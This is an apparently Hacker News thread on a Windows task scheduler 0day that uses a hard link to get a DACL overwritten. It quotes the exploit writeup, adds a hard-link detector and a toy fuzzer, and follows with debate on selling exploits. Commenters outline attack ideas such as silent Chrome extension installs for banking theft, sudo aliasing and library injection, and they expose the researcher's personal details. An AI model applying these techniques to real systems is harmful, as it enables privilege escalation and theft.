Here's the exploit description from the writeup .doc file that is included in the .rar file that's hosted on GitHub:
The task scheduler service has an alpc endpoint, supporting the method “SchRpcSetSecurity”.
The prototype looks like this:
long _SchRpcSetSecurity(
[in][string] wchar_t* arg_1, //Task name
[in][string] wchar_t* arg_2, //Security Descriptor string
[in]long arg_3);
Tasks created by the task scheduler will create a corresponding folder/file in c:\windows\system32\tasks.
This function seems to be designed to write the DACL of tasks located there, and will do so while impersonating.
However, for some reason it will also check if a .job file exists under c:\windows\tasks and try to set the DACL
while not impersonating.
Since a user, and even a user belonging to the guests group, can create files in this folder, we can simply create
a hardlink to another file (all we need is read access).
Because of the hardlink, we can let the task scheduler write an arbitrary DACL
(see second parameter of SchRpcSetSecurity) to a file of our choosing.
So any file that we have read access over as a user and that system has the write DACL permission for,
we can pivot into full control and overwrite it.
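The precondition the writeup leans on is a hard link planted in a folder that any user can write to, pointing at a file elsewhere. A defender can audit such a folder for exactly that: a regular file whose link count is above one is aliased somewhere else on the volume. The following is an added example, not code from the writeup or from the exploit archive; it uses `st_nlink` from `os.stat`, which Python populates on both Windows and POSIX, and a `build_demo_tree` helper that constructs a sample layout (a `protected/` file hard-linked from `tasks/evil.job`) so it runs offline. Directory names are assumptions; on a real host you would point it at the folder the writeup names.

```python
import os
import stat
from pathlib import Path


def find_hardlinked_entries(directory):
    """Return [(path, link_count)] for regular files in `directory`
    whose link count is above one, i.e. the same file data is reachable
    under at least one other name on this volume."""
    suspicious = []
    for entry in Path(directory).iterdir():
        try:
            st = entry.lstat()          # lstat: do not follow symlinks/junctions
        except OSError:
            continue                    # vanished or unreadable; skip, do not fail
        if stat.S_ISREG(st.st_mode) and st.st_nlink > 1:
            suspicious.append((str(entry), st.st_nlink))
    return suspicious


def match_against_watchlist(suspicious, watchlist):
    """For each suspicious entry, report which watchlisted file (if any)
    it aliases, using os.path.samefile (device + inode / file index)."""
    matches = []
    for path, _count in suspicious:
        for protected in watchlist:
            try:
                if os.path.samefile(path, protected):
                    matches.append((path, protected))
            except OSError:
                continue
    return matches


def build_demo_tree(root):
    """Constructed sample layout (assumption, not a real system path):
    root/protected/target.dll  <- a file a low-privileged user may only read
    root/tasks/evil.job        <- hard link to it, planted in a writable folder
    root/tasks/ok.job          <- an ordinary file with link count 1
    Returns (tasks_dir, target_path, link_path)."""
    tasks = os.path.join(root, "tasks")
    protected = os.path.join(root, "protected")
    os.makedirs(tasks, exist_ok=True)
    os.makedirs(protected, exist_ok=True)
    target = os.path.join(protected, "target.dll")
    with open(target, "wb") as fh:
        fh.write(b"constructed sample content")
    link = os.path.join(tasks, "evil.job")
    os.link(target, link)               # hard link: same data, second name
    with open(os.path.join(tasks, "ok.job"), "wb") as fh:
        fh.write(b"benign job file")
    return tasks, target, link


if __name__ == "__main__":
    import tempfile
    tasks_dir, target_path, _ = build_demo_tree(tempfile.mkdtemp())
    found = find_hardlinked_entries(tasks_dir)
    for path, count in found:
        print(f"link count {count}: {path}")
    for path, protected in match_against_watchlist(found, [target_path]):
        print(f"{path} aliases watchlisted file {protected}")
```

The link count alone is a cheap signal to alert on; the watchlist step tells you which protected file is being aliased. On Windows the same information is available interactively with `fsutil hardlink list <file>`, which prints every name a file has.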
If you find the default font size too small, I know at least Chrome and Firefox support a minimum font size in their settings.
I personally set my minimum font size to 9. While I can't easily read font that small, I can at least notice it is there and zoom or otherwise compensate if I care what it says while still mostly preserving the aesthetic of the web page (assuming the font is purposefully small for a reason).
Thank you for the description, I was hesitant to download a .rar just to read something...
> So any file that we have read access over as a user and that system has the write DACL permission for, we can pivot into full control and overwrite it.
Doesn't this imply we can use guest access to install any kind of backdoor, since we'll have "read access" to a bunch of programs that start on boot? Seems really bad, maybe I'm misinterpreting (I haven't been on Windows for a while).
True that. Not even mentioning the insane amount of telemetry data they are "sending home" on a regular basis. You think social networks are bad? Well, take a look at your AV...
I really did not get anything for this bug, and I know I'm probably forfeiting an acknowledgement
too right now. But I wasted a lot of time on this bug, and nobody but me should be able to decide
what to do with it. People who criticize this type of behavior I find frankly annoying.
I used to be one of those self-righteous types, but I'm also pretty annoying, so perhaps there is a correlation.
Besides, this bug is way too silly in its complexity to be of any use to anyone.
I would not drop a full 0day exploit, which I can assure you,
I have totally sitting on my hard drive (not referring to this bug :).
For the people wondering why she released the exploit instead of claiming bounty on it, in the blog post[1] dated 14th June, she said she would not drop a full 0day exploit. I guess that changed when she did not get credit for her last bug (cve-2018-8314) according to her another blog post[2] from Aug 17th.
> I really did not get anything for this bug, and I know I'm probably forfeiting an acknowledgement too right now. But I wasted a lot of time on this bug, and nobody but me should be able to decide what to do with it. People who criticize this type of behavior I find frankly annoying. I used to be one of those self-righteous types, but I'm also pretty annoying, so perhaps there is a correlation.
> Besides, this bug is way too silly in its complexity to be of any use to anyone. I would not drop a full 0day exploit, which I can assure you, I have totally sitting on my hard drive (not referring to this bug :).
Reading through the author's blog (links found further below) it would seem that on more than one occasion the author didn't receive credit, which presumably makes it harder to find new jobs.
The author's blog is also full of anti-social comments, which would sound awfully melodramatic if I didn't have personal experience with depression. Regardless, it is a public expression that she's going to be a fairly toxic person to work with, which is almost certainly working against her in the job hunt.
Earlier tweets from this account seem to indicate they believe MS intentionally sabotaged the process so that they could sell the bugs, including to oppressive governments:
I'm not understanding. Is this lady mad because she wants to get out of bug hunting, so she found a major MSFT bug and tried to sell it, and they patched it and thwarted her attempt at that?
> I'm also transgender. But my transition so far has been really difficult (social isolation, lack of support.. etc), my voice is still really manly and I don't really pass at all (which probably weirds people out.. so I would rather say it upfront so I don't need to have anxiety about it, I have a lot of anxiety issues). I also have not been able to change my name yet, legally it's still "Thomas".
- - -
w.r.t. the 0-day release: Well that's some seriously irresponsible stuff right there.
I think she has a tough time (she's transgender and doesn't have support from her peers). It's sad that she hasn't found a way to live a happy life although she clearly has serious skills. I hope she'll be fine.
It's just annoying that a lot of users are now at risk, I hope the patches will be installed ASAP.
It's honestly extremely difficult to get by in the first world as a white hat security researcher. Bug bounty payouts look big, but unless you're hitting a 10K bug a month you're better off with a Rails gig. And that will be very hit-or-miss, because who the hell knows if $COMPANY will play ball this time or not? Or if you're the first person to find the bug you spent weeks searching for?
Exploit development security research is something that there's a surprisingly small market for... unless you're selling vulns. And buyers are usually either government intelligence services or organized crime (skipping right past "what's the difference hyuk hyuk hyuk").
You're right! Penetration testing is one way to make money!
It sometimes can be perhaps slightly less lucrative than you might expect, with your average pen tester paid significantly less than your average SWE. And often somewhat different than the kind of specialty skills someone focused on (say) Windows Internals might have. Compare with selling exploits, where a month's worth of highly enjoyable work might turn into mid-five-figures. Or higher.
You're absolutely right. Penetration testing and code auditing are ways to make money. It's possible that there may be some relevant differences in both subject and compensation is all.
Finding exploits and performing a security audit are often very different tasks. A person that can do one is not always able to do the other.
Companies, such as companies that sell surveillance software to governments, do hire people to just find exploits, but judging by leaked emails that can be a stressful job as you are expected to regularly deliver new exploits.
If you sold to a country with standing sanctions, that could be an issue. 0-day's can also be considered munitions in some interpretations of law, though I am not a lawyer nor a weapons dealer.
I see, downvotes incoming. Maybe I should explain:
> I think she has a tough time (she's transgender and doesn't have support from her peers)
This is from her website, I don't like armchair-psychoanalysis, either:
> I'm also transgender. But my transition so far has been really difficult (social isolation, lack of support.. etc), my voice is still really manly and I don't really pass at all (which probably weirds people out.. so I would rather say it upfront so I don't need to have anxiety about it, I have a lot of anxiety issues). I also have not been able to change my name yet, legally it's still "Thomas".
Seems I was the only one who clicked on her website. The first question I've had in my mind: "What does this person feel? It's weird to publish 0-days on Twitter with a little bit of rant"
For the downvoters: Would love to know why you downvoted me. Maybe I can clarify some aspects.
I think you got downvoted for saying that full-disclosure is irresponsible.
Many people I've talked to are in favor of full-disclosure and think that coordinated disclosure is dangerous in the long term, as large companies with the resources to actually develop secure software are not sufficiently incentivized to do so under coordinated disclosure.
Edit: I've also noticed on HN that sometimes I will get downvoted really hard for no clear reason and then two weeks later HN will magically transform my downvotes into upvotes. Not really sure why that happens, maybe a wave of bot banning?
> Edit: I've also noticed on HN that sometimes I will get downvoted really hard for no clear reason and then two weeks later HN will magically transform my downvotes into upvotes. Not really sure why that happens, maybe a wave of bot banning?
Yup, I've seen this more recently but now the cycle is faster. My comments regularly get downvotes but then later in the evening they turn into upvotes.
Also back in Dec 2017, there was a huge wave of people shilling on reddit for ICOs and subreddits would regularly post what "HN users think" and "how to correct them".
You're being downvoted because it looks like you're bringing in irrelevant information about her being transgender. Edit your comment putting the actual explanation first. The fact that she's transgender is only secondary, if that.
It absolutely is relevant. Imagine being born into a body of your opposite sex and having to deal with a society that isn't advanced enough to realize the binary genders arose out of the industrial revolution for productivity efficiency to benefit the few. It still is this way, but we don't have factories with prison-like buildings to work in; we are all still feudal subjects.
I'd like to also point out that there is a very real cabal of HN nicks that is actively doing drive by downvotes on specific topics centring around LGBTQ+, immigration and ICOs.
I started seeing this back in 2014 and it correlated with the rise of r/the_donald. There are even amino groups that specifically coordinate such attacks. For instance, the Damore threads were really interesting. Within the first few hours of posting there were a lot of comments that seemed off for the HN userbase, defending Trump and Damore's manifesto. Counter comments were flagged and downvoted.
We know reddit is under the influence of shills and HN is not exempt.
> I don't want to work in IT security anymore. All the industry bullshit ruined it for me. I can't even motivate myself anymore to bug hunt. But I have no other skills to make money with, I'm so screwed.
and
> Will sell to people in the eastern hemisphere too. I just want money so I can travel.
I can sympathize with her strife, but she is on the path to seriously burn bridges. I can't imagine many security focused companies would touch her with a 10 foot pole now that she publicly admitted that she is willing to sell a 0day for profit. Sure she is going through a rough time, but even when angry, you have to not say things you regret, especially online.
EDIT: Did not realize selling bugs outside of bug bounty programs and related bug programs was a normal thing. Now I know.
>I can't imagine many security focused companies would touch her with a 10 foot pole now that she publicly admitted that she is willing to sell a 0day for profit.
Selling 0days for profit isn't the issue. The more pressing issue, considering she seems to be desperately looking for an employer, is that she has aired her life openly, honestly, and unfiltered through the same channels as her professional work. Sorry, but any serious employer isn't going to hire somebody who is openly unstable, especially not the "suicidal/disappearing for months at a time" unstable.
I'd recommend reading the rest of her twitter posts, plus the content she has published on her website, to get a better idea of her character. While she has a moderate amount of technical ability in her specific niche, it's nowhere near the level that would justify hiring past all of the red flags.
It's unfortunate, but she really needs to re-invent her online presence by decoupling her severe emotional issues from her showcased professional work.
In the security industry, selling a 0day for profit is not taboo at all. Some of the most well known researchers openly do this, and they are very employable.
Some companies have policies that don’t allow you to sell them while employed there (it’s awkward when your employee sells a bug in software sold by a client/partner/competitor/supplier), but they wouldn’t generally blacklist anyone who had sold bugs in the past.
I think it's a grey area, and the seller has to do research into the buyer. It's kind of like if you're an authorized firearms dealer. There's no issue selling to the general population, but if you knowingly sell to someone who intends to use it for a crime, then you can get arrested. That's what the researcher who stopped the WannaCry worm was arrested for; the FBI had logs showing that he'd helped build a tool to spy on Android devices, and that he knew the buyer was going to use it to commit crimes.
Not all 0 day vendors are shady either. At an old employer, we were authorized to purchase 0 days with company money to use during penetration tests because they wanted us to emulate state-sponsored attacks. The vendor had a website for their company and customer support as well. Immunity Canvas also has an optional subscription for 0 days you can purchase to use with their framework.
Sure, under what theory of law wouldn't it be? I mean, assuming of course that there is no insider dealing here, that they didn't have any hand in creating the security vulnerability themselves (or inducing its creation), but that they only discovered something out there in the world, then they have the right to talk about that as they see fit. Or not, or sell it. There may be social consequences, and if they're employed by someone else there could be terms in their contract covering that or a range of other legal behavior, but publishing/selling true information one discovers is protected under general law (and common sense frankly). It could be different if the entity they were selling to was itself a criminal enterprise and they knew or should have known that ("a reasonable person would have"), but even that is not an issue for government agencies, or selling it to the responsible developer, or to generalist security middlemen companies that do things like buy these up and then sell special early notice to their clients or such. There are legal entities that are willing to pay for some exploits, and it's legal to sell to them.
Many security researchers have voluntarily decided on a moral level that they care about general security welfare most of all and that following specific standards and timelines of disclosure will maximize that, but even with the same goal reasonable people can disagree there too, right up until full disclosure immediately. Some are just paid for that, because like open source an organization might decide that better security overall will ultimately be good for their bottom line (like Google). And some people just want fame or to put food on the table via their unique marketable skills, which is their call too.
It's questionable, and doing it wrong can get you sued or worse. Here's [1] EFF advice on it, but as usual getting a lawyer knowledgeable in the area is your best bet.
Most people that publish play with fire but have learned some boundaries making it somewhat safe.
As a transgender person, this is all that happens in our lives to be honest. It's very tough to have anything but a 'rough time' when the general public views you weirdly, and your family/friends have completely abandoned you.
But these bridges aren't being burned as a result of this person being trans, the bridges are being burned as a result of this person dropping 0 days and associating the professional vuln research with personal anti-social posts.
I don't think you are contradicting prolikewh0a's point. To rephrase their point in terms of your language, it's difficult to not be (openly) anti-social if you feel like society is anti-you.
Not impossible and not necessarily excusable. Just... difficult.
>it's difficult to not be (openly) anti-social if you feel like society is anti-you.
This is really accurate. I've really had to work on making good decisions and working on some slight anger issues during my transition after pretty much all of my family abandoned me, a lot of my friends started making fun of me publicly or just abandoned me totally. It's a significant reason why I moved across the country to Seattle -- a more open and accepting area of the USA -- to make new friends and get a job that was very open to LGBT persons. It's still tough, but the life change, surrounding myself with people who support me, really helped.
Unfortunately, depression and anxiety don't really limit themselves to a specific domain, and the anxiety of gender dysphoria is pretty all-consuming since you can't really stop being reminded of it
Applying armchair psychology and a tiny bit of my own experience with trying to express frustration, I think this is using melodramatic/caricaturized negative articulation to express opposites to the point being made.
As in, this person wants the opposite of everything being stated, and they're frustrated to the point of saying "of course I want everything to be going as badly as it is". I honestly don't read this any other way.
I didn't mean in terms of a bug bounty. I meant in terms of trying to sell it to something like a foreign gov't or deep web entity. The other guy above said the same thing as you, I did not know at all that researchers sold bugs separately from bug bounty programs.
Frankly, the only reason this doesn't happen more often is that it's hard. Unless you know the right people, finding a buyer for a bug like this is nearly impossible these days. The more legitimate routes are easier, faster, and require less work -- for instance, no need to have a solid exploit, just a good write-up.
There are ethical issues surrounding brokers like Zerodium, Grugq, et. al. Specifically, that 95% of the time you know that bug is going to NSA, CIA, FBI, DoD, GCHQ, BND, Mossad, etc.
You're absolutely right. Many good, wonderful, amazing people consider that an ethical concern sufficient to stop them in their tracks!
It's perhaps possible that some people, in some scenarios, might be willing to compromise on the ethics of their situation in exchange for a significantly higher chance of a much, much higher payout.
EDIT:
To expand slightly, anyone in a position to pay out for bug bounties should consider carefully what they are willing to do to shift incentives towards ethical behavior. The ability to attack your systems is worth money to those who would do so. It should be worth more to you than to them. How much are you, hypothetical person making such choices, willing to spend?
It's perhaps unfair to expect highly skilled people to take a 90%+ discount on the value of their work in order to be more ethical. Ethics are incredibly important! But it can be difficult to argue that successfully in the face of a breathtaking ask.
Then the bug bounty programs can step up and pay what bugs are actually worth. The right bug in Windows could decimate their entire OS market, but most companies that I've seen tend to pay some flat rate for bugs.
Thus my point: until bug bounties are calculated to approach or exceed the black or grey-market value of exploits, they can't strongly push people towards ethical behavior.
Right now bug bounties seem mainly to serve as a way for skiddies in the third world with burp to make for-them-bank on trivial XSS vulns and for serious professionals to make a little extra money. And, y'know, to serve the PR purpose of being able to say you have a bug bounty program.
What stops someone from "leaking" the bug after getting paid, or getting paid multiple times for the same 0-day? You know, to even the playing field from just the TLAs from having all of the fun?
You get significantly more money - some exploits are worth $100-250k. You just need to ask in underground hacker forums and not on Twitter. But doing business with those guys is hard af because no one can trust each other.
A popular trade-off is to work for a government contractor. You can get that kind of money as a salary, and the trust issues are all taken care of. Having a real salary is helpful if you want to get a loan to buy a house. It evens out your finances.
Somebody like SandboxEscaper would qualify technically, but I have a feeling that running off randomly to foreign countries and hinting at a possible suicide would be disqualifying. The government frowns on that sort of stuff when sorting out trust issues.
Possibly because they didn't think there was a market for legitimate use of such information, and selling something for clear use in a criminal act is a different story, and may even be criminal in itself depending on circumstances. Even if the industry accepts that (not implying that it does), openly airing it might be a different matter.
Some level of assumption is often required to efficiently converse, so we just have to accept that occasionally the assumptions are a little more off base than we would like.
.. how could you not? The valley and the great tech industry are rife with libertarianism. 0-days are a market like any other: either companies pay researchers the market rate so they can fix their bugs before they get sued by their customers, or they don't, in which case any number of less reputable sources will pay for them.
Absolutely. I always thought that if you can find multiple 0days, you are good enough to land into any senior developer position in a few weeks. Is that not the case? And why? To me, being able to find 0days was always synonymous with "broad knowledge" + "out of the box thinking".
I always found that while I could probably spend 6-8 months studying to try to land a job at one of the big tech companies to do RE/security research/malware analysis or whatever you want related to that, I usually got more interested in reverse engineering something new and quickly got bored reviewing the details of binary search trees.
Limits jobs at the big 4/5 as nearly every job that involves security research/RE will inevitably still have the standard leetcode algorithms whiteboard interview, but there's plenty of other stuff out there if you're willing to put together a decent portfolio. The few exceptions to that are being so famous you can make it to recognized teams, but that isn't a realistic goal for most engineers.
If there's a company you really, really want to work for, you can responsibly disclose something to them and at least get an in-person. Skip the phone algorithms test and go right to the whiteboard! Heck yeah.
Being good at reverse engineering, analysis, and programming are almost completely orthogonal to being able to implement 5 variations of search algorithms from memory on a whiteboard in syntactically correct code.
I'm not surprised. For me, the process of reporting to MS has gone:
1) Jump through a surprising number of hoops to set up a Windows 10 Insider channel machine, reproduction on which is required for their security program.
2) Email a write-up and PoCs to their security address.
3) Get back two emails naming a point of contact and dumping a pile of legal agreements they expect me to follow just for reaching out to them.
4) Receive no further contact or indications of progress.
Fuzzers[1] as well as reverse engineering tools. For fuzzers there are both publicly available ones like AFL [2] and custom/closed source ones. It seems to me every zero day author has their own fuzzers or fuzzing frameworks or at least a closed fork of an open source fuzzer. But to me finding the bug is less difficult than turning it into an exploit. Shoot, you can still find bugs in modern software by bit flipping. As an example, I wrote a fuzzer that opened up random PDF files and flipped some bits at random and then opened them with Preview. It did this about 40,000 times a day and after a couple of days I would come back and my mac had kernel panicked. Now turning one of these PDF files that cause kernel panics into an exploit is going to require significantly more effort than writing and running a dumb fuzzer.
Wow....that is pretty interesting. How do you write your own fuzzer? Seems like that's where the edge comes from. How much more of an effort is it to write an exploit? Is it necessary to build a Proof of Concept or is simply disclosing the vulnerability enough?
If I buy ADA what software/API can I start tinkering with?
What you described seems like so much fun but scared of the writing exploit part. Now that seems really hard especially considering it needs to be fully undetectable for a long time until the buyer gets their return on investment.
Is there a course or resource I can use to begin this path?
I love love poking around with things to see how they work....basically the chase or the process is what I enjoy most and curious to know more.
> wow....that is pretty interesting. how do you write your own fuzzer, seems like that's where the edge comes from? How much more of an effort is it to write an exploit? Is it necessary to build a Proof of Concept or is simply disclosing the vulnerability enough?
Dumb fuzzers can be written in anywhere from a day to a few weeks of work; smart fuzzers can take several years to write. Also, lots of fuzzers continually evolve over time because they have to. It's the Red Queen effect[1]: fuzzers keep finding bugs, so they have to keep getting better to keep finding harder and harder to find bugs in a target codebase. So I would say an exploit is usually the harder task, but some of the things smart fuzzers like SAGE[2] do would be incredibly hard to implement.
> If I buy ADA what software/API can I start tinkering with?
I'm not sure what ADA is. However for testable software I would go for programs that come installed on your operating system of choice. So in my case I was using MacOS at the time so I was targeting MacOS default applications.
> What you described seems like so much fun but scared of the writing exploit part. Now that seems really hard especially considering it needs to be fully undetectable for a long time until the buyer gets their return on investment.
Fuzzer development and exploit development are pretty different tasks. Fuzzer development is basically normal software development, while exploit development, at least with security mitigations turned on, is an entirely different beast. For example, in exploit development you're going to need to know x86-64 assembly, as well as general memory layout, and how a particular operating system implements ASLR[3] so you can bypass that, as well as bypassing DEP/NX[4], which is often done using ROP[5] and now recently newer techniques[6]. The fuzzer I was describing above was a dumb file mutation fuzzer, which can be extremely simple. So first it was a file fuzzer, meaning it fuzzed programs that take files as inputs, stuff like video and music players or in my case PDF files. The mutation part means the fuzzer took existing valid files and added random mutations, as opposed to generative fuzzers that build semi-valid files from scratch. The dumb part means it didn't do cool stuff like AFL, which uses a genetic algorithm and probe system to better test code paths in a target program.
> Is there a course or resource I can use to begin this path?
Search fuzzers online until you've seen every/most pages; no joke, that's basically what I did. There are a few books, but most of the info they have can be found online for free. Also make sure to try building a fuzzer or two; go simple at first. As well as using existing open source fuzzers like AFL, Trinity and syzkaller.
> How did you get into all of this?
I forget how I got into fuzzing, but I did try and start a fuzzing company a few years ago. It turns out it's way easier making money doing web development than selling fuzzing software or doing bug bounties for a living.
A good place to start is learning how to poke at some API, and fuzzers are a good way to do that. Pick some API that you think is complex (often places with previous bugs still have bugs), find a way to bang on it with all sorts of malformed data until something happens (crash, fault, or such). When you find that, you now have a set of inputs that the API is not sanitized against. Then you can try to disassemble, using tools like IDA Pro (best, but expensive), free reversing tools, kernel debuggers, etc. to get a handle on what is going wrong. At some point you might find the precise error at the assembly level. Then you may try to craft your inputs to bypass checks and affect the underlying system in a way you control. Here there are an astounding number of tricks and ways to bypass various security features, and you will have to read extensively to get a large bag of tricks for this step.
Now you have a decent exploit.
Each of these steps takes learning through just doing it and reading. You'll learn tools for various pieces of the game. But it's doable with decent effort.
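The "dumb file mutation fuzzer" described two comments up, and the "bang on it with malformed data until something happens" loop in the comment just above, both come down to the same harness: take a valid seed input, flip random bits, feed the result to the target, and record anything that is not a clean rejection. The block below is an added example written for this thread, not the commenter's PDF fuzzer. It fuzzes a constructed toy parser (`parse_records`, a made-up length-prefixed record format that rejects a bad magic cleanly but trusts its count and length bytes), and de-duplicates crashes by exception type and line so one bug is reported once rather than forty thousand times.

```python
import random
import traceback


def parse_records(data):
    """Constructed toy target (assumption: stands in for a real file parser).
    Format: b'RC' magic, one count byte, then `count` records of
    <length byte><payload>. A bad magic is rejected cleanly (ValueError);
    the count/length bytes are trusted, so truncated data indexes past
    the end, which surfaces as an unhandled IndexError."""
    if data[:2] != b"RC":
        raise ValueError("bad magic")
    count = data[2]
    pos = 3
    records = []
    for _ in range(count):
        length = data[pos]                      # IndexError when data runs out
        records.append(bytes(data[pos + 1:pos + 1 + length]))
        pos += 1 + length
    return records


# Constructed valid seed: two records, b'abc' and b'x'.
SEED_FILE = b"RC\x02\x03abc\x01x"


def flip_bits(data, n_flips, rng):
    """Dumb mutation: return a copy of `data` with n_flips random bits flipped.
    The length never changes, only content."""
    buf = bytearray(data)
    for _ in range(n_flips):
        bit = rng.randrange(len(buf) * 8)
        buf[bit // 8] ^= 1 << (bit % 8)
    return bytes(buf)


def fuzz(target, seed_file, iterations, rng_seed=0, max_flips=3,
         graceful=(ValueError,)):
    """Feed `iterations` mutated copies of seed_file to `target`.

    Exceptions listed in `graceful` mean the parser rejected bad input on
    purpose and are ignored. Any other exception counts as a crash. Crashes
    are keyed by (exception type, line number of the failing frame) so the
    same bug hit many times is reported once, with the first input that
    triggered it kept for reproduction. Returns {signature: input}."""
    rng = random.Random(rng_seed)                # fixed seed: reproducible runs
    crashes = {}
    for _ in range(iterations):
        mutated = flip_bits(seed_file, rng.randint(1, max_flips), rng)
        try:
            target(mutated)
        except graceful:
            continue
        except Exception as exc:
            frame = traceback.extract_tb(exc.__traceback__)[-1]
            signature = (type(exc).__name__, frame.lineno)
            crashes.setdefault(signature, mutated)
    return crashes


if __name__ == "__main__":
    found = fuzz(parse_records, SEED_FILE, iterations=300, rng_seed=1)
    for (exc_name, line), sample in found.items():
        print(f"{exc_name} at line {line}: reproducer {sample!r}")
```

The split between `graceful` exceptions and everything else is the part worth copying: a target that rejects input is doing its job, and only unhandled faults belong in the crash bucket. Replacing `parse_records` with a wrapper that launches a real program on a temporary file and watches its exit status gives you the commenter's setup; the mutation and de-duplication logic stays the same.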
what API or software should I start with? Also, @SandboxEscaper mentions logic based exploits vs memory based ones which are disappearing (?), what is she referring to?
also any good resources on starting this journey. I'm very serious about this because it potentially could be a dream job for me.
Start by looking up an exploit that has details published, and recreate it. Do that a few times, and you will begin to understand how it works without the frustration of not finding anything. As you get better you'll both get better at finding things and at dealing with the long periods of not feeling like you're making progress. I suspect there's sites that help you walk through this, and I know I've seen ones that walk you through prepared exploits.
You really just have to start putting in legwork consistently.
I also love the idea of digital prepping (? Not sure if there's a real term for it). Even just jokingly preparing to have a set of tech work after some kind of apocalypse. UPS/solar driven home LAN with a server running copies of wiki, stack overflow, various other resources. Maybe a bunch of music/movies/games. Whatever would assist us if we lost the internet and power grids.
I don't actually think that's likely to happen, but I absolutely do enjoy some mild prepping just for fun and because the effort is so low I might as well be prepared (we have a bugout bag, extensive first aid kit, all the basic tools and survival gear, etc).
It's also just handy to have this stuff around and "own" it rather than always depend on others to be there for us.
I've often wondered about obtaining my own copy of wikipedia (and other knowledge) to put on a portable device. It would be very useful when I jump in my time machine to travel back in time. I'm going to need to know how to build things so that I can become the "winner" of history. Of course, as history would show us if we learned, when you upset the apple cart, the establishment usually eliminates the threat. So, that's the last piece I haven't worked out yet. Oh, and the time traveling bit.
Not terribly terrified. At best it seems to be a Medium IL to SYSTEM. In other words a slightly better UAC bypass than most, but I don't think you can use it to escape from a browser sandbox for example.
People always seem to overlook this distinction... escalating admin privileges is typically one of the easier things for a hacker to do. Getting in is the harder part (i.e., remote/browser exploits, etc.).
I'm not really sure if that is true. Adobe exploits are pretty cheap and unless your target is in software you can usually get a click on a link one way or another.
Really, to me, the hard part is getting in without needing to have the user consciously do anything since then you're in and nobody could even have noticed you doing something.
> Really, to me, the hard part is getting in without needing to have the user consciously do anything
That's why I said remote/browser, everything else is noisy and therefore the 'easy' route. Usually this is sufficient for low-tech nation states because they attack organizations, not individuals, so all you need is a weak human link where noisy isn't a big deal. Then moving horizontally across the organization.
But more importantly, OSes are terribly insecure and privesc bugs are a dime a dozen. You don't need zero days to achieve that the vast majority of the time.
Yeah, sorry, a no-click / remote exploit is hard. I agree with you there.
But a browser exploit isn't. They're a dime a dozen. Also, I'm surprised that email is still a primary vector that's used to get people to click on links with their work computer. It seems like such a monitored method compared to, say, a LinkedIn contact.
Have they changed their policy on UAC not being considered security barrier on administrator accounts since W10? Windows was screwed for a long time[1], in practice not much better than running in SYSTEM all the time like in Windows 95 days.
I'm not even sure they will ever change it. It was designed for Vista using a security model that now corresponds to the "always ask" setting, and hastily changed to propose the two other settings for Windows 7 because users were thinking it asked too often. But the other settings do not even correspond to a sound security model, so there are hundreds or maybe thousands of bypasses in Windows if using those, which include the default setting. That's why MS simply declared that it is not a security boundary, because they had no sound model to make it work against. It's a "best effort" casual mitigation.
Several of these are patched every month. It’s a non-event for the most part. If somebody was targeting you personally, it isn’t going to be a local privilege escalation bug that closes the gap for them.
From what I gather this is privilege escalation for an attacker that already has arbitrary code execution. It is serious but not "shut everything down immediately" serious. Malware or malicious apps you already have could be made more dangerous.
It looks like a local privilege escalation per the comments elsewhere in the post. That's bad, but a low-ish risk to casual use of a personal device unless it's combined with some other way to get your system to execute an attacker's binary.
As a hacker I can assure you that I can just easily annoy you with UAC pop-ups until you click "Ok". So it doesn't really add much and you don't need SYSTEM to do great harm, anyways.
You can install Chrome extensions without the user noticing (built this in the past) which gives you access to basically everything without even resorting to DLL injections (I don't share this because it's dangerous and can't be fixed by the Chromium team). Reminder: It's possible to hijack 2FA and online banking with this method. I've read the source code of Zeus and SpyEye, I can do the same thing a) without AV detection and b) without DLL injections (which are very easy to spot).
If you know the Win32 APIs, it's extremely easy to build malicious software that doesn't need escalated privileges.
edit: I'm pretty sure I can implement it on Mac and Linux, too. I don't like the sentiment that those systems are more secure, it's just the difference in usage.
edit2: I can recommend Sandboxie. Please use it to get a little bit more security.
I'm genuinely curious how you'd go about doing what you describe.
I'm vaguely aware that Chrome has a mechanism to silent-install extensions, IIRC when they're placed in the filesystem in a certain way, specified in the registry, or configured via GP. I don't remember which, but I think they install silently. Failing all that, you can probably just extract the extension into the Chrome profile folder and on next restart it'll pick it up.
You saying it "gives you access to basically everything" makes me think you're doing one of the techniques above, which does bypass the permissions dialogs.
And sure, "Access all data on all websites you visit" would grant you the ability to see everything in every webpage and do what you're describing.
I honestly wouldn't mind knowing which Win32 APIs you're referring to. Perhaps you could drop a couple of them, so I get a ballpark idea of which direction you're going in with that.
Finally, the reason I'm writing this comment, really, is that I'm _most_ curious how you'd implement "it" on macOS and Linux too. I 100% agree that both are just as vulnerable as Windows in their own ways but have less market share. I would be extremely interested to hear some of the ways you'd particularly go about attacking Linux, which I use everyday.
> Failing all that, you can probably just extract the extension into the Chrome profile folder and on next restart it'll pick it up.
No, this would be a security hazard. All the mentioned ways require admin privileges or even group policy privileges. I'm doing it without any permissions.
Chrome hardened the process to protect their users. They're doing the best they can, but the Win-APIs are too powerful and there is no sandbox (like those for Mac) in place. Officially, all ways (registry keys, files, ...) require admin privileges for a very good reason.
Mac has its own sandbox and Linux offers SELinux and I was talking about a security vulnerability I have written for Windows specifically, that's why I gave the tip for Sandboxie.
> Perhaps you could drop a couple of them, so I get a ballpark idea of which direction you're going in with that.
> I would be extremely interested to hear some of the ways you'd particularly go about attacking Linux, which I use everyday.
Sorry, I can't talk about this specific attack in detail because this vulnerability can't be fixed. It's conceptually fairly simple and <400 LoC and I'm sure you can find it on your own if you're determined.
For Linux and security: If you're not constantly monitoring your running processes and bash scripts, privilege escalation and others can be easily pulled off (e.g. simply aliasing sudo). As an example, it's extremely simple to extract all stored passwords from Chrome and others [1]. That's the reason I prefer to use separate password managers (most of them protect their address space), although you can easily hack them as well. That's the reason I prefer encrypted virtual drives - it's unconventional and most tools don't cover it so the hacker has to search for them manually. Security is mainly making it more difficult to find the stuff, it's nearly impossible to hide it completely (otherwise the user wouldn't be able to access it, too).
It's a big field, so I don't really know what you're interested in. You can find exploits on https://www.exploit-db.com and look for things that are interesting for you. For most of the pwnage, you don't need any exploits (except the chain of remote exploits to get in). As soon as you're in, you can do anything without any problems - getting root user, keylogging [2] (very easy for X11), injecting shared libraries (especially easy on Linux with LD_LIBRARY_PATH) and other stuff.
I would recommend sandboxing tools, network- and host-based IDS/IPS, a good firewall which also analyzes behavior patterns and a healthy amount of paranoia. Many AV systems are mainly security risks themselves and add a false sense of security, it's extremely easy to bypass them and their sandbox-analyzers.
